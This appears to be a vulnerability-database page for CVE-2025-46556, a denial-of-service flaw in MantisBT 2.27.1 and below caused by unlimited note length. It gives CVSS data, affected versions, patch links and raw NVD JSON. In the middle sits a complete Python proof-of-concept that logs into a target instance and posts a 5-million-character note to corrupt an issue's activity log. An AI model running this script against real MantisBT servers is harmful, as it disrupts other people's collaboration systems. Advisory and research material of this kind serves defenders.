Security Vulnerability Report
CVE-2025-46556 CVSS 6.5 MEDIUM

CVE-2025-46556

Published: 2025-11-04 01:15:33
Last Modified: 2025-11-07 18:30:03

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.27.1 and below allow attackers to permanently corrupt issue activity logs by submitting extremely long notes (tested with 4,788,761 characters) due to a lack of server-side validation of note length. Once such a note is added, the activity stream UI fails to render; therefore, new notes cannot be displayed, effectively breaking all future collaboration on the issue. This issue is fixed in version 2.27.2.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* - VULNERABLE
MantisBT < 2.27.2
MantisBT = 2.27.1
MantisBT = 2.27.0
MantisBT <= 2.26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-46556 PoC - MantisBT overly long note denial-of-service attack
# Target: MantisBT <= 2.27.1


def exploit(target_url, username, password, issue_id):
    """
    Exploit for CVE-2025-46556
    This PoC demonstrates how submitting an extremely long note
    can corrupt issue activity logs.
    """
    login_url = f"{target_url}/login.php"
    bugnote_url = f"{target_url}/bugnote_add.php"

    # Create session
    session = requests.Session()

    # Login to MantisBT
    login_data = {
        "username": username,
        "password": password
    }
    resp = session.post(login_url, data=login_data)
    if "login" in resp.url.lower():
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Create extremely long note (4,788,761+ characters)
    # This will corrupt the activity log
    long_note = "A" * 5000000  # 5 million characters

    # Submit the long note
    note_data = {
        "bug_id": issue_id,
        "bugnote_text": long_note,
        "mode": "add"
    }
    resp = session.post(bugnote_url, data=note_data)
    if resp.status_code == 200:
        print(f"[+] Successfully submitted long note to issue {issue_id}")
        print("[-] Activity stream for this issue is now corrupted!")
        return True
    else:
        print(f"[-] Failed to submit note (status: {resp.status_code})")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <issue_id>")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    issue = sys.argv[4]

    exploit(target, user, pwd, issue)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46556", "sourceIdentifier": "[email protected]", "published": "2025-11-04T01:15:33.257", "lastModified": "2025-11-07T18:30:03.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.27.1 and below allow attackers to permanently corrupt issue activity logs by submitting extremely long notes (tested with 4,788,761 characters) due to a lack of server-side validation of note length. Once such a note is added, the activity stream UI fails to render; therefore, new notes cannot be displayed, effectively breaking all future collaboration on the issue. This issue is fixed in version 2.27.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.27.2", 
"matchCriteriaId": "B49EF21D-F412-4C89-BFA8-9606F204E310"}]}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/c99a41272532ba49b5c8dccb7797afead9864234", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/commit/d5cec6bffb44d54bd412c186b9baa409b1aa4238", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/commit/e9119c68b4a0eaa0bbde3deb121e81f5f7157361", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-r3jf-hm7q-qfw5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}